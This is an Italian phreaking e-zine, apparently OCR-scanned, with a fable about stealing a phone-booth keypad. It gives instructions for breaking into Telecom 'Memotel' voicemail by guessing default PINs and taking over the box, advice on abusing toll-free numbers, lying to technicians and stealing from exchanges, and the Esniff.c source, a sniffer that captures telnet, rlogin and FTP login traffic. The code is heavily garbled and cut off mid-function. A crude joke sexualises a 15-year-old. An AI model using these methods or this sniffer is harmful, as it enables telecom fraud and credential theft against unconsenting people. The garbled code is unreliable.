.-._./-._.=/-._.->La favoletta di MotorJovy e mR_bIs0On<-/-._.-A-._.-A-, 


C'era una volta, tanto tempo fa, ma cos. tanto (ieri), un fanciulletto dal 
soave nome di mR_bIsOn, con le gote rosse e i capelli d'oro che viveva da 
solo con sua madre, suo padre, suo fratello e gli inquilini della porta 
accanto (solo!ndMr_Skull). 

Un beld la madre gli disse: 

-Cappuccetto Baison!!! 

-Mamma, $ scritto male! 

-Ah, si scusa tesoro... senti, vai perfavore a portare questo cestino di 
Kalashmikov (si scrive cos?) alla nonnina, che la notte scorsa ha bevuto 
troppo e ora le gira la testa... 

-Un minuto ma' 

-Muovi immediatamente quelle fottute chiappe da quel cazzo di sedia o prendo 
la scopa 

-Quella elettrica? 

-Obbedisci! E stasera a letto senza cena 

-Meglio (nel comodino ci* tanto di quella roba: sukki di frutta, nutella...)! 
-E mi raccomando, non passare per la villa che c'$ il lupo cattivo e 
soprattutto ci sono le squadracce Telekom! 

-Ok ma! 

Ma il nostro mR_bIs0n voleva passare per la villa a sputare i vecchietti sulle 
panchine. Nel mezzo del cammin di nostra vita, per*, sent un rumore 
assordante... era il MotorJovy con il suo scooter supertruccato... 

MJ-TS 

MotorJovy TrucchescionScuter - Messa a punto parti: 


MBK-Nitro 


* Marmitta Polini "Evoluzione" con silenziatore con bordini neri indelebili 

* Carter da corsa "Top Performance" con bordini neri indelebili 

* Cinghia da corsa super-resistente con bordini neri indelebili 

* Asportazione del classico cavalletto per maggiore stabilit... e tenuta in 
curva (in realt... dava fastidio al silenziatore della marmitta) 

* Cavalletto tipo "125" con bordini neri indelebili 

* Carenatura nuova di zecca con bordini neri indelebili 

* Centralina per la regolazione della candela con bordini neri indelebili 

* Super adesivato con bordini neri indelebili 

($ tutto professionaaaaaleeeee!ndPastore)(SBONK!ndBovas) 


-mR_bls0n: MotorJovy! Cosa ci fai qui!? 

-MotorJovy: Mah! 

-mR_bls0On: io sto andando dalla mia dolce n1onn... 

-MotorJovy: guarda! Quella cabina $ aperta 

-mR_bls0On: diuao! Andiamo a vedere!!! 

I due si avvicinano alla cabina 

-MotorJovy: smontiamola!! 

-mR_bls0On: aiutami... hai un cacciavite? 

-MotorJovy: Un coltello... vabbene ugualmente? asp, che lo prendo... 

(Traffica nelle mutande) 

-MotorJovy: eccolo 

-mR_blsOn: cavolo, , piccolo... ma mi accontento comunque... ne hai anche uno 
a croce??? 

-MotorJovy: asp, che vedo... 

(Altro traffico) 

-MotorJovy: eccolo! 

-mR_bls0On: smonta il tastierino che io penso al rotor... 

-MotorJovy: a che??? 

-mR_bls0n! fai, fai... 

I due si mettono a praticare... 

Sul display della cabina appare dapprima "FS" e poi scompare... 

-Cabina: Beep beep beep beep beep 

-MotorJovy: che cazzo S??? 

-mR_blsOn: cavolo!!! sta segnalando manomissione alla centralina!!! 
Sbrighiamoci!!!! 

Finito di smontare il rotor, il nostro eroe e il suo amico vanno verso lo 
scooter 

-MotorJovy: Asp, che metto il tastierino sotto il sellone... Dammi che metto 
il rotore... mo'... il coso! 

-mR_bls0n: Ok tieni, ma sbrigati! 

-MotorJovy: Cavolo! Non entra!!!! Misterba', prendilo in mano e sali dietro 
lo scooter con me... 

-mR_bIs0n: OKkazzo0... 
BRO0000000000000UUUUUUUTUUUUUUUUNUUVTUUTUUUUOOOOOOO00O0GROAHNNN 
NNN 


I due si lanciano in una folle corsa per le strade di Manduria con il rotor 
ben in vista... 

Arrivano a casa di MotorJovy sani e salvi, lasciano la refurtiva nel garage. 
E, come si dice in questi casi, vissero per sempre felici e contenti... 


THE END 


Casa mR_bIs0n 


mR_bls0n's Mum: Pronto, chi parla??? 
mR_bIs0n's Grandmother: Angelaaaa, il Baison non mi ha portato il cestino di 
Kalashmikov!!! 
mR_bIsOn: nonna, non $ scritto bene! 
mR_bls0n's Grandmother: ah, scusa... 
Mr_Skull: vabb,, tutto $ andato per il meglio, per* ricordate: 
MADRE GODURIA SEMPRE IN CULO A LORO!!! 
mR_bls0n: Sei sempre il migliore a sparare cavolate... 


a. _.N-,_.+/-.->Come si usa e abusa di una segreteria Memotel<-.-/-._.-/-, 
Artikolo scritto interamente e solamente da mR_bIsOn con l'approvazione di 
Mr_Skull 


Memotel? 


Un po'di anni fa alla telekaxx, gli venne in mente la brillante idea di 

creare una segreteria "CON LA SEGRETERIA GIA' DENTRO AL TELEFONO!!!" (cos 
sponsorizzavano la novit... sulle skede telefonike...). 

Bene, in poke parole per averla bisogna chiederla direttamente alla telekaxx 

e vi verr... attivato il servizio, infatti non $ una segreteria fisica con 

cassetta ect... 

Se ne avete scoperta una, o su numero verde, o su di un normale numero, bene... 


Cosa dobbiamo fare? 

Per prima cosa, quando parte la voce registrata, voi premete "#", vi verr... 
chiesto un codice ke di solito S "1234"... se non S cos, allora provate 
numeri come "5555" o "9876" o roba simile... la gente S molto stupida... 
quando avete finito di digitare dovete premere di nuovo "#". 

E una volta entrati? 

Bene se avete azzeccato il codice una voce registrata vi informer... se sono 
presenti nuovi messaggi o precedentemente ascoltati... il men- vi si 


presenter... in questo modo: 


Tasto Azioni e scelte varie 


-1-  Perascoltare i messaggi: 
-7- per cancellare il messaggio ascoltato 
-9- per archiviare il messaggio ascoltato 
che verr... rimosso solo dopo 15 giorni dall'archiviazione 


-2-. Per accedere al men- opzioni: 

-1- per cambiare il codice di identificazione personale 
bisogna immettere il nuovo codice e poi ripeterlo per 
conferma 

-2- per scegliere i messaggi di presentazione 

-1- per i messagi pre-registrati 

-2- per registrare il messagio di presentazione 
che avverte che il numero chiamato $ occupato 

-3- per registrare il messagio di presentazione 
che avverte che il proprietario del numero 
chiamato non pu* rispondere 

-4- per registrare il messagio di presentazione 
che avverte che il proprietario del numero non 
$ al momento raggiunguibile 

-3- Per uscire dalla segreteria. 


-*-. Per uscire da qualsiasi men- in cui vi trovate. 
Cosa ci consigli di fare? 


Bene, per prima cosa chiamate sempre da una cabina (io lo faccio nel 50% dei 
casi, $ molto pi- comodo chiamare dal salotto di casa ma molto pi- 

rishioso... io amo il pericolo...), cambiate per prima cosa il codice di 
identificazione (usatene uno molto difficile e cambiatelo spesso), lasciate 

dei vostri messaggi registrati, magari sputtandando qualcuno (io l'ho fatto!!! 
EHEHHUHUHIHIH), registrando con degli amici, oppure vantandovi di aver 
fottuto la segreteria e mandando al diavolo chi chiama... 


Bene, mR_bIsOn, ora non ci servi pi-, ti abbiamo solo usato... Bob (c'$ 
sempre un Bob) fallo fuori... 


EHEHE ke cavolicchio vuoi fare con una Condor (per gli eretici, pistola 
giocattolo ad aria compressa con proiettili di 9mm, che di solito fanno male 

ma non provocano la morte...)... UNHAHUAHAH (risata ke peggiora l'insulto)... 
spara spara spara demente... 


Scar scar Can you feel my power? 
Shot here and the world gets smaller! 
Scar scar Can you feel my power? 
One shot and the world gets smaller! 
Scar scar Can you feel my power? 
Shot here and the world gets smaller! 
Shot Shot Shot MotherFucker! 


Shot Shot Shot MotherFucker! 
Shot Shot Shot MotherFucker! 


Grabbato dalla canzone "Reflective God" 
dell'album "Antichrist SuperStar" 
di Marilyn Manson (anno 1996) 


mR_bls0n 


_A-._.+N-._.+/-._.->Due parole sulla pericolosit... dei green<-/-._.-A-._.-4-, 
Artikolo scritto interamente e solamente da mR_bIsOn con l'approvazione di 
Mr_Skull 


Ci sono tante persone (parekki finti phreaker) ke si buffoneggiano dicendo: 
"Uhuh... greenz, ahah ci si fa male con le proprie mani..." Ecco! Cafoni del 
genere pensano ke i green siano solo i numeretti magici della CIS ke 
permettono di navigare gratis... coglioni... nemmeno io userei un green 
illegale... i green sono soprattutto dei numeri gratis (effettuabili anke da 
cabine senza monete o skede) ke permettono di fare tante kose sfiziose a 
danno della Telekaxx o ad altre societ... private... tutto ci*, se fatto da una 
pubblica cabina telefonica $ sicurissimo... io da un sacco di tempo provo 
tanti green e non mi $ successo mai nulla... Mettiamo ke la centrale telekozz 
della tua citt... si accorga ke qualkuno stia facendo delle kiamate a numeri 
verdi non consentiti e ke mandi una squadra di Omini TeleGum ke ti vedono 
lavorare nella cabina... cosa vuoi ke facciano? Ti ammanettano? TI torturano? 
Ti uccidono? Niente, non possono farti un bel niente!!! Non possono sapere 
con certezza se sei tu il mascalzone, se stai facendo qualke prova sui green, 
o se stai facendo una normale kiamata... e se ti prendono (cosa altamente 
improbabile) puoi smentire comunque subito: 


-Possibilit... 1- 

Omino Telekazz: Cosa stavi facendo nella cabina??? 

TU: Io? Io? Io sono appena arrivato! Stavo per kiamare a mamm...! 
Ed ho aspettato ke se ne andasse l'okkupante di prima... 


-Possibilit... 2- 


Omino Telekazz: Cosa stavi facendo nella cabina??? 

TU: Ke cavolo ti interessa? Sono fatti miei! 

Omino Telekazz: Tu stavi facendo dei numeri verdi non consentiti... 
TU: Ah? Kosa sono? Io stavo solo scrivendo a kazzo dei numeri! 
Omino Telekazz: Bene non farlo pi-! 

TU: (alzando il dito medio) FOTTITI! 


-Possibilit... 3- 
Omino Telekazz: Cosa stavi facendo nella cabina??? 
TU: Niente di particolare, stavo solo utilizzando un numero verde per kiamare 


in America senza spendere un soldo... perkS a te kosa interessa? Se vuoi 
te lo insegno... 
(Vi sconsiglio di usare questa scusa...) 


Quindi non vi preokkupate se state provando dei green... non vi cagate 
addosso... io un giorno stavo controllando i messaggi di una segreteria su 
green, e affianko all'altra cabina c'era un Omino ke stava riparando una 
cornetta... gi... ke stavo gli ho fottuto un po'di filo telefoniko dalla 
cassettina ke aveva... EHEHEHEHEHEH!!! 


Cmq vi devo dire di stare alla larga di certe persone ke blaterano: "EIII! 
Andiamo alla cabina ke adesso devo kiamare in America con un numero verde... 
AI massimo pikkiatelo! 


mR_bls0n 


sN _.2/-,_.-/A-.->Come si deventa phreaker o quasi<-.-/\-._.-/-._.-A-, 


Artikolo scritto interamente e solamente da mR_bIsOn con l'approvazione di 
Mr_Skull 


Questo art non $ uno quei soliti art dei grandi hacker, ke sputtanando i 
lamer, spiegando chi $ un hacker... ma bens spiego come fare per essere 

o diventare, non dico un phreaker (altrimenti kissa quanta critika) ma uno 

ke si diverte tanto ai telefoni! Bene, in Italia se non fai brute forcing, usi 

per forza green... boxare $ impossibile ed anke volendo, difficile... 

Bene i green sono semplici e divertenti, e almeno a me non fanno paura, e 
chiunque pue dilettarsi... bastano una cabina e un interessato che abbia 
almeno un dito utilizzabile... 

Io almeno ho iniziato cos , mi diverto tutt'ora e ora non mi definisco un 
phreaker (sempre per la critika... e allora, cara critika, dimmelo tu ki 

kazzo sono! Ah, dimmelo ki sono, un bastardo ke apre kabine, prova green e si 
diverte... allora dimmelo, siccome phreaker non sono, kosa kazzo sono! * 
Scusate per lo sfogo!*), e ho una buona conoscenza di ci* ke si pu* fare con i 
sistemi telefonici (sbaglio o questo 5 phreaking?). 

Bene, io avevo appena 14 anni quando ho iniziato, ero un ragazzino curioso, 
e quando uscivo la sera con gli amici provavo, cos per giocare, dei numeri 
verdi tipo: 16756565 o 167454545, e pian piano scoprivo nuove cose, ne 
parlavo su IRC con gli amici... ankora faccio allo stesso modo, e soprattutto 
mi diverto e con me anke i miei amici (ke risate quando registravamo messaggi 
di benvenuto con i miei amici ad una segreteria su green...). 

Quindi, ki $ davvero intenzionato a diventare phreaker non si spaventi 
quando una signorina al telefono dice: "Inserire codice prego" e riattakki, 
ma provasse "1234" oopure "0000" e sentire cosa risponde! 


mR_bis0n 


sN _.eN-._.+N-.->Consigli vari e forse utilie<-.-/-._.-A-._.-A-,_.-A- 


Vorrei consigliarvi qualkosa da fare per farsi "na ccultura" nel phreaking... 


Da leggere: 
- L'elenko telefoniko Telekazzarola ke ci sono tante cose interessanti da 
leggere e qui vi riporto un passo: 


Carte Telefoniche 
Scheda Telefonica Prepagata 


[al 

La richiesta di sostituzione della scheda non utilizzata e provvista del 
talloncino di sicurezza deve essere rivoltata alla Filiale Telecom di 
competenza che fornir... anche ogni opportuna informazione relativa 
all'eventuale malfunzionamento della scheda. 


Bene, ditemi ora come KAZZO faccio a vedere se la maledetta skeda funziona 
o no se deve essere per forza provvista di talloncino... vado ad intuito 
forse... 


- Telefonia generale, un librone ke pu* essere facilmente fottuto in una 
qualsiasi centrale TeleFuck... 


- Prendersi i cataloghi G.P.E (www.gpekit.com) ke vendono dei bei kit di 
montaggio (es. Centralino telefonico, Microtrasmettitore per la 
trasmissione di conversazioni telefoniche... e tante altre cose sfiziose) 


- Qualsiasi cosa parli di telefonia e elettronica... riviste, opuscoli... 


- Urbis et Orbis, il mio libro di Latino ke konsiglio di leggere ma non 
centra comunque un cazzo... 


Da fare: 
- Crearsi un gruppo di amici fidati, per lavorare insieme... S molto pi- 
divertente, almeno secondo me... (il fatto sta ke io lavoro ankora solo...) 


- Procurarsi un cellulare ke $ molto utile, (non intendo dire di mandarsi 
squilli, messaggini amorosucci, con amikette e fidanzatine, cuoricini e 
fiorellini... e nemmeno per mettersi a dire in giro: "Oki Walter, comprane 
10.000 e vendi tutte quelle azioni ke sono al di sopra di..." perk$ $ da 
dementi...) infatti e comodo per fare chiamate a green e altro... 


- Visitare le centrali Telesuck per grabbare tanta robba!!! 


- Trovarsi una ragazza (anke brutta, bha contenti voi!), ke vi consoli se vi 
hanno tolto la segreteria su green ke utilizzavi a sbafo! 


- Indire una conferenza 


Phreaking in Italia e l'ambiente CyberPunk 
Tenuta dal professore mR_bIsOn e dall'esperto Mr_Skull 
Ingresso gratuito 
Salone delle conferenze del Municipio 
1 
- Crearsi una radio pirata per distribuire informazioni sul phreaking 


mR_bls0n 


ae. _.-A-.->Saluti vari<-.-A-._.A-,_.A-, A_N, 
Questa lunga e pesante deliriata si $ conclusa, se vi piace fateci sapere... 
ma comunque non ce ne "futta" nulla... eheheh 


Comunque sentirete parlare di noi presto con nuove riviste e guide... forse un 
giorno o l'altro vedrete in prima pagina de "la Repubblica": Ragazzo 15enne 
arrestato per molestie sessuali ad una ragazza 27enne... e non sar... il caso 
mio (mR_bIs0n) (sto aspettando da un sacco di tempo una pedofila sui 20 anni 
che mi molesti sessualmente!!!) ma se guardate pi- basso forse noterete: 
Ragazzo 15enne arrestato per danni alla TeleCom Italia... 


Vabb$ ora un po'di saluti (solo di mR_bIs0On... Mr_Skull non ama i saluti...): 
Vorrei salutare alcuni miei amici e compagni di skuola (e non solo...) 
- Davide, il mio amikone (anke kiamato Panino, per via della sua rotondit...) 
con il quale trascorro il tempo sfottendo varie persone... risate 
assicurate... 


- Giorgio, una vittima dei nostri insulti... un tipo assai divertente... 


- Federika, forse la mia unika amika in classe... spesso parliamo del suo 
ragazzo, spesso di cazzate... 


- Gabriella, una tipa a cui ho insegnato a kome usare il suo Siemens C25... 

- Marco, l'uniko in klasse a soppravvivere ogni giorno senza aver fatto i 
compiti assegnati...(nonkS mio kompagno di banko... eheheh uso sempre il 
suo StarTak nell'ora di Religione...) 


- Peppo, anke konsciuto kome Giusy, un tipo prepotente ma divertente... 


- Ilaria, una ragazza di 1ganno (io so' di 26!!!) co capelli rossi, ke oggi 
ha detto ke non sono il suo tipo... se ne pentir...!!! 


- Elisa, una mia amika, una delle pi- belle ragazze ke io abbia mai 
conosciuto... 


- Le Iene!!! Si proprio quelle di Italia Uno!!! Siete fantastici!!! 


- Il minikaktus ke mia quella scoppiata di mia madre ha messo sulla case del 
PC... ma ke kaxxo mi centra??? 


Dedicato a (sempre e solo mR_bIs0On...): 
Daniela, l'unika ragazza della mia vita... 


EI! Non fraintendete! Non $ la mia unika ragazza in senxo di fidanzata... 
Veramente non S nemmeno la mia ragazza... comunque kiss...... 


No, non preoccupatevi non faccio e non faro mai uso di stupefacenti. 
Questo non e' altro che un articolo riguardante lo sniff che e' l'arte 

di intercettamento di una comunicazione via internet. 

Esistono in giro sulla rete vari software per poter sniffare; il piu' 

famoso nel mondo UNIX e' il TCPDUMP (e gia il nome dice tutto). Esiste 
anche software per DOS ed NT che pero' ha il problema dell'accesso 
diretto da parte di un task alla scheda di rete. 

Tutto il traffico che passa su un cavo in cui noi abbiamo accesso 

puo' essere sniffato, l'utilizzo migliore dello sniff avviene con la 

rete ethernet. Ethernet non e' altro che un protocollo che lavora 
spedendo i pacchetti con le informazioni a tutti i computer collegati 

a tale rete, l'intestazione del pacchetto contiene il proprio indirizzo 

e l'indirizzo di destinazione. 

Gli sniffer funzionano in maniera molto semplice non fanno altro che 
dire alla scheda di rete di raccogliere tutti i pacchetti che passano 

sul cavo di rete invece che solo quelli che sono destinati all'indirizzo 
della scheda, questo avviene settando quest'ultima in modalita' PROMISCUE 
MODE in modo da potergli dire di ricevere tutti i pacchetti che transitano 
sulla sua scheda. Questo succede perche' la scheda quando riceve i 
pacchetti ethernet prende solo quelli destinati al suo MAC address. 

Se la macchina da noi utilizzata e' collegata con un cavo coassiale 
abbiamo la possibilita' di utilizzare lo sniff in modo piu' approfondito 
che utilizzando solo il doppino telefonico dato che su quest'ultimo 
passano solo i pacchetti destinati alla mia macchina. 

Come gia' molti di voi sapranno che il cavo coassiale e' gia' di per se 

un mezzo BROADCAST quindi abbiamo la possibilita' di sentire tutto quello 
che gli altri dicono sul filo elettrico. 

Se avete anche la possibilita' di avere accesso al cavo che collega i 

vari router al MIX (che e' il nodo di interscambio di traffico 

tra i vari provider) allora occorre delimitare lo spezzone della 

rete, dobbiamo, cioe', selezionare quello che ci interessa indicando 

gli indirizzi di arrivo e di partenza in modo da non sovraccaricare 

il SO. 

Chiaramente uno sniffer va' su qualsiasi macchina della nostra rete: 
sulla macchina remota, sul server locale o su una terza macchina, 

il tutto dipende dal tipo di rete che collega i nodi presi in 

questione. 

Un esempio pratico: io mi trovo in una universita' e quindi ho molte piu' 
possibilita' di sniffare del traffico che passa sui miei cavi rispetto 

a quello che passa in Finlandia. 

Ci sono vari prodotti di sniff in giro ma per ora ve ne lascio uno 

da compilare : 


/* [JOIN THE POSSE!I] */ 
/* Esniff.c */ 


#include <stdio.h> 


#include <ctype.h> 
#include <string.h> 


#include <sys/time.h> 
#include <sys/file.h> 
#include <sys/stropts.h> 
#include <sys/signal.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <sys/ioctl.h> 


#include <net/if.h> 
#include <net/nit_if.h> 
#include <net/nit_buf.h> 
#include <net/if_arp.h> 


#include <netinet/in.h> 
#include <netinet/if_ether.h> 
#include <netinet/in_systm.h> 
#include <netinet/ip.h> 
#include <netinet/udp.h> 
#include <netinet/ip_var.h> 
#include <netinet/udp_var.h> 
#include <netinet/in_systm.h> 
#include <netinet/tcp.h> 
#include <netinet/ip_icmp.h> 


#include <netdb.h> 
#include <arpa/inet.h> 


#define ERR stderr 


char *malloc(); 
char *device, 
*ProgName, 
*LogName; 
FILE *LOG; 
int. debug=0; 


#define NIT_DEV "/dev/nit" 

#define CHUNKSIZE 4096 /* device buffer size */ 
int if fd =-1; 

int Packet[CHUNKSIZE+32]; 


void Pexit(err,msg) 

int err; char *msg; 

{ perror(msg); 
exit(err); } 


void Zexit(err,msg) 

int err; char *msg; 

{ fprintf(ERR,msg); 
exit(err); } 


#define IP ((struct ip *)Packet) 
#define IP_OFFSET (0x1FFF) 

#define SZETH  (sizeof(struct ether_header)) 
#define IPLEN  (ntohs(ip->ip_len)) 
#define IPHLEN  (ip->ip_hl) 

#define TCPOFF  (tcph->th_off) 

#define IPS (ip->ip_src) 

#define IPD (ip->ip_dst) 

#define TCPS (tcph->th_sport) 

#define TCPD (tcph->th_dport) 
#define IPeg(s,t) ((s).s_addr == (t).s_addr) 


#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) 


#define MAXBUFLEN (128) 
time_t LastTIME = 0; 


struct CREC { 
struct CREC *Next, 


*Last; 
time_t Time; /* start time */ 
struct in_addr SRCip, 
DSTip; 

u_int SRCport, /* src/dst ports */ 

DST port; 
u_char Data[M A XBUFLEN+2]; /* important stuff :-) */ 
u_int Length; /* current data length */ 
u_int PKcnt; /* # pkts */ 
u_long LASTSeg; 


ki 

struct CREC *CLroot = NULL; 
char *Symaddr(ip) 

register struct in_addr ip; 

{ register struct hostent *he = 


gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); 


return( (he)?(he->h_name):(inet_ntoa(ip)) ); 


char *TCPflags(flgs) 


register u_char flgs; 
{ static char iobuf[8]; 
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:"-) 


SFL(0,TH_FIN, 'F'); 
SFL(1,TH_SYN, 'S'); 
SFL(2,TH_RST, 'R'); 
SFL(3,TH_PUSH,'P'); 
SFL(4,TH_ACK, 'A'); 
SFL(5,TH_URG, 'U'); 
iobuf[6]=0; 
return(iobuf); 


} 


char *#SERVp(port) 

register u_int port; 

{ static char buf[10]; 
register char *p; 


switch(port) { 
case IPPORT_LOGINSERVER: p="rlogin"; break; 
case IPPORT_TELNET: —p="telnet"; break; 
case IPPORT_SMTP: p="smtp"; break; 
case IPPORT_FTP: p="ftp"; break; 
default: sprintf(buf,"%u",port); p=buf; break; 


return(p); 


} 


char *Ptm(t) 

register time_t *t; 

{ register char *p = ctime(t); 
pIstrlen(p)-6]=0; /* strip" YYYY\n" */ 
retum(p); 


} 


char *NOWtm() 
{ time_t tm; 
time(&tm); 
return( Ptm(&tm) ); 
} 


#Édefine MAX(a,b) (((a)>®))?(a):b)) 
#Édefine MIN(a,b) (((a)<(b))?(a):©)) 


/* add an item */ 
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ 
register struct CREC *CLtmp = \ 


(struct CREC *)malloc(sizeof(struct CREC)); \ 
time( &(CLtmp->Time) ); \ 
CLtmp->SRCip.s_addr = SIP.s_addr; \ 
CLtmp->DSTip.s_addr = DIP.s_addr; \ 
CLtmp->SRCport = SPORT; \ 

CLtmp->DSTport = DPORT; \ 
CLtmp->Length = MIN(LEN,MAXBUFLEN); \ 
bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ 
CLtmp->PKcont = 1; \ 
CLtmp->Next = CLroot; \ 
CLtmp->Last = NULL; \ 
CLroot = CLtmp; \ 
} 


register struct CREC *GET_NODE(Sip,SP,Dip,DP) 
register struct in_addr Sip,Dip; 

register u_int SP,DP; 

{ register struct CREC *CLr = CLroot; 


while(CLr != NULL) { 

if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && 
IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) 
break; 

CLr = CLr->Next; 

} 

return(CLr); 

} 


#define ADDDATA_NODE(CL,DATA,LEN) { \ 

bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length], LEN); \ 
CL->Length += LEN; \ 

} 


#define PR_DATA(dp,ln){ \ 
register u_char lastc=0; \ 
while(In-- >0) { \ 
if(*dp<32){ \ 
switch(*dp) { \ 
case ‘\0": if((lastc=="\r") || (lastc=="'\n") || lastc=="\0') \ 


break; \ 

case ‘\r": \ 

case '\n': fprintf(LOG,"\n 1"); \ 
break; \ 

default : fprintf(LOG,"A%c", (*dp + 64); \ 
break; \ 

} \ 
} else { \ 


if(isprint(*dp)) fputc(*dp, LOG); \ 


else fprintf(LOG,"(%d)",*dp); \ 
} \ 
lastc = *dp++; \ 
} \ 
fflush(LOG); \ 
} 


void END_NODE(CLe,d,dl,msg) 
register struct CREC *CLe; 
register u_char *d; 
register int dl; 
register char *msg; 
{ 
fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptim(&CLe->Time)); 
fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); 
fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); 
fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", 
NOWtm(),CLe->PKcnt,(CLe->Length+d]),msg); 
fprintf(LOG," DATA: "); 
{ register u_int i = CLe->Length; 
register u_char *p = CLe->Data; 
PR_DATA(p,i); 
PR_DATA(d,dl); 
} 


fprintf(LOG,"\n-- \n"); 
fflush(LOG); 


if(CLe->Next != NULL) 
CLe->Next->Last = CLe->Last; 
if(CLe->Last != NULL) 
CLe->Last->Next = CLe->Next; 
else 
CLroot = CLe->Next; 
free(CLe); 

} 


/* 30 mins (x 60 seconds) */ 
#define IDLE_TIMEOUT 1800 
#define IDLE_NODE() { \ 
time_t tm; \ 
time(&tm); \ 
if(LastTIME<tm) { \ 
register struct CREC *CLe,*CLt = CLroot; \ 
LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \ 
while(CLe=CLt) { \ 
CLt=CLe->Next; \ 
if(CLe->Time <tm) \ 


END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \ 
} \ 
} \ 
} 


void filter(cp, pktlen) 
register char *cp; 

register u_int pktlen; 

{ 

register struct ip “ip; 
register struct tcphdr *tcph; 


{ register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type); 


if(EtherType < 0x600) { 
EtherType = *(u_short *)(cp + SZETH + 6); 
Cp+=8; pktlen-=8; 


if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ 
return; 


} 


/* ugh, gotta do an alignment :-( */ 
bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); 


ip = (struct ip *)Packet; 

if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ 
return; 

tcph = (struct tcphdr *)(Packet + IPHLEN); 


if(!( (TCPD == IPPORT_TELNETY) || 
(TCPD == IPPORT_LOGINSERVER) || 
(TCPD == IPPORT_FTP) 
)) return; 


{ register struct CREC *CLm; 
register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); 
register u_char *p = (u_char *)Packet; 


p += ((IPHLEN * 4) + (TCPOFF * 4)); 


if(debug) { 

fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); 
fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); 
fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); 

} 


if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { 
CLm->PKcnt++; 


if(length>0) 
if( (CLm->Length + length) < MAXBUFLEN ) { 
ADDDATA_NODE( CLm, p,length); 
} else { 
END_NODE( CLm, p, length, "DATA LIMIT"); 


} 


if(TCPFL(TH_FINITH_RST)) { 
END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST"); 
} 


} else { 


if(TCPFL(TH_SYN)) { 
ADD_NODE(IPS,IPD, TCPS,TCPD,p,length); 
} 


} 


IDLE_NODE(); 
} 
} 


/* signal handler 

cui 

void death() 

{ register struct CREC *CLe; 


while(CLe=CLroot) 
END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); 


fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); 
fflush(LOG); 
if(LOG != stdout) 
fclose(LOG); 
exit(1); 
} 


/* opens network interface, performs ioctls and reads from it, 
* passing data to filter function 

ni 

void do_it() 


int Cc; 
char *buf; 
u_short sp_ts_len; 


if(!(buf=malloc(CHUNKSIZE))) 
Pexit(1,"Eth: malloc"); 


/* this /dev/nit initialization code pinched from etherfind */ 
{ 
struct strioctl si; 
struct ifreq_ ifr; 
struct timeval timeout; 
u_int chunksize = CHUNKSIZE; 
u_long if_flags = NI_PROMISG; 


if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) 
Pexit(1,"Eth: nit open"); 


if(ioctl(if_fd, I SRDOPT, (char *)RMSGD) < 0) 
Pexit(1,"Eth: ioctl (I. SRDOPT)"); 


si.ic_timout = INFTIM; 


if(ioctl(if_fd, I PUSH, "nbuf") < 0) 
Pexit(1,"Eth: ioctl (I PUSH \"nbuf\")"); 


timeout.tv_sec = 1; 

timeout.tv_usec = 0; 

si.ic_cmd = NIOCSTIME; 

si.ic_len = sizeof(timeout); 

si.ic_dp = (char *)&timeout; 

if(ioctl(if fd, I STR, (char *)&si) < 0) 
Pexit(1,"Eth: ioctl (I STR: NIOCSTIME)"); 


si.ic_cmd = NIOCSCHUNK,; 

si.ic_len = sizeof(chunksize); 

si.ic_dp = (char *)&chunksize; 

if(ioctl(if_fd, I STR, (char *)&si) < 0) 
Pexit(1,"Eth: ioctl (I STR: NIOCSCHUNK)"); 


strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_ name)); 
ifr.ifr_namelsizeof(ifr.ifr_name) - 1] = \0'; 
si.ic_cmd = NIOCBIND; 

si.ic_len = sizeof(ifr); 


si.ic_dp = (char *)&ifr; 


if(ioctl(if_fd, I STR, (char *)&si) < 0) 
Pexit(1,"Eth: ioctl (I STR: NIOCBIND)"); 


si.ic_cmd = NIOCSFLAGS; 

si.ic_len = sizeof(if_flags); 

si.ic_dp = (char *)&if_flags; 

if(ioctl(if fd, I STR, (char *)&si) < 0) 
Pexit(1,"Eth: ioctl (I STR: NIOCSFLAGS)"); 


if(iocti(if_fd, I FLUSH, (char *)FLUSHR) < 0) 
Pexit(1,"Eth: ioctl (I_FLUSH)"); 
} 


while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { 
register char *bp = buf, 
*bufstop = (buf + cc); 


while (bp < bufstop) { 
register char *cp = bp; 
register struct nit_bufhdr *hdrp; 


hdrp = (struct nit_bufhdr *)cp; 
cp += sizeof(struct nit_bufhdr); 
bp += hdrp->nhb_totlen; 
filter(cp, (u_long)hdrp->nhb_msglen); 
} 
} 
Pexit((-1),"Eth: read"); 
} 
/* Authorize your proogie, generate your own password and uncomment here */ 
/* #define AUTHPASSWD "EloiZgZejWyms" */ 


void getauth() 
{ char *buf,*getpass(),*crypt(); 
char pwd[21],prmpt[81]; 


strcpy(pwd,AUTHPASSWD); 
sprintf(prmpt,"(%s)UP? ",ProgName); 
buf=getpass(prmpt); 
